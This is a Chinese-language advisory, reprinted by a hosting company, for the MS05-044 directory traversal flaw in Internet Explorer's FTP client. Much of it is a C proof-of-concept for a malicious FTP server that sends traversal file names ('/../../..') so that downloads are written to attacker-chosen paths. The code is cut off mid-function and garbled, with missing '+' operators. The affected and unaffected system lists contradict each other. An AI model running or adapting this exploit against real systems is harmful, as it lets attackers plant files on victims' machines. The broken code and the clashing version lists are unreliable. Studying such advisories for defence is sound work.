Microsoft Windows FTP客户端目录遍历漏洞（MS05-044）

发布日期：2005-10-12
更新日期：2005-10-13

受影响系统：

Microsoft Windows XP SP1
Microsoft Windows Server 2003
Microsoft Internet Explorer 6.0 SP1
- Microsoft Windows 2000 SP4

不受影响系统：

Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4

描述：

---

BUGTRAQ ID: 12160
CVE(CAN) ID: CVE-2005-2126

Microsoft Windows是微软发布的非常流行的操作系统。

Microsoft Windows的Internet Explorer捆绑了内嵌的FTP客户端。这个FTP客户端不能正确地验证从FTP服务器接收的文件名。如果客户端手动选择使用FTP传输文件的话，攻击者就可以修改文件传输的目标位置。此漏洞可能允许攻击者将文件写入位于受影响的系统上的任何文件系统。

<*来源：Albert Puigsech Galicia （ripe@7a69ezine.org）

链接：http://www.securiteam.com/windowsntfocus/5NP0615EKM.html
http://www.microsoft.com/technet/security/Bulletin/MS05-044.mspx
http://www.us-cert.gov/cas/techalerts/TA05-284A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>

#define MAX_BUF 1024
#define FTP_PORT 21

int main(int argc, char **argv) {
char ch;
char buffer[MAX_BUF 1];
char ipbuf[MAX_BUF 1];
char *local_file, *remote_file;
int sfdmain, sfdses, sfddata;
int readed;
int ip1,ip2,ip3,ip4,port1,port2;
int fd;
struct stat st;
struct sockaddr_in ftpmain = { AF_INET, htons(FTP_PORT), INADDR_ANY };
struct sockaddr_in ftpdata;

if (argc < 3) {
printf("\t7a69Adv#17 - Internet Explorer FTP download path disclosure prof of concept\n");
printf("Use:\n");
printf("\t%s <local_file> <remote_file>\n", argv[0]);
exit(0);
}

local_file = argv[1];
remote_file = argv[2];

if ((fd = open(local_file, O_RDONLY)) == -1) {
perror("open()");
exit(-1);
}

if ((sfdmain = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}

if (bind(sfdmain, (struct sockaddr *)&ftpmain, sizeof(struct sockaddr)) == -1) {
perror("bind()");
exit(-1);
}

if (listen(sfdmain, 1) == -1) {
perror("listen()");
exit(-1);
}

if ((sfdses = accept(sfdmain, NULL, NULL)) == -1) {
perror("accept()");
exit(-1);
}

write(sfdses, "200 OK\r\n", 8);

while ((readed = read(sfdses, buffer, MAX_BUF)) > 0) {
buffer[readed] = 0;
printf(">> %s", buffer);
if (!strncmp(buffer, "noop", 4)) write(sfdses, "200 OK\r\n", 8);
else if (!strncmp(buffer, "USER ", 5)) write(sfdses, "331 OK\r\n", 8);
else if (!strncmp(buffer, "PASS ", 5)) write(sfdses, "230 OK\r\n", 8);
else if (!strncmp(buffer, "CWD ", 4)) write(sfdses, "250 OK\r\n", 8);
else if (!strncmp(buffer, "PWD", 3)) write(sfdses, "257 \"/\"\r\n", 9);
else if (!strncmp(buffer, "TYPE ", 5)) write(sfdses, "200 OK\r\n", 8);
else if (!strncmp(buffer, "PORT ", 5)) {
sscanf(&buffer[5], "%i,%i,%i,%i,%i,%i", &ip1, &ip2, &ip3, &ip4, &port1, &port2);
snprintf(ipbuf, MAX_BUF, "%i.%i.%i.%i", ip1, ip2, ip3, ip4);
ftpdata.sin_family = AF_INET;
ftpdata.sin_addr.s_addr = inet_addr(ipbuf);
ftpdata.sin_port = htons(port1*256 port2);
if ((sfddata = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
if (connect(sfddata, (struct sockaddr *)&ftpdata, sizeof(struct sockaddr)) == -1) {
write(sfdses, "421 OK\r\n", 8);
} else {
write(sfdses, "220 OK\r\n", 8);
}
}
else if (!strncmp(buffer, "LIST", 4)) {
write(sfdses, "150 OK\r\n", 8);
snprintf(buffer, MAX_BUF, "-rwxrwxrwx 1 0 0 1 Dec 08 07:36 /../../../../../../../../../../..%s\r\n", remote_file);

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!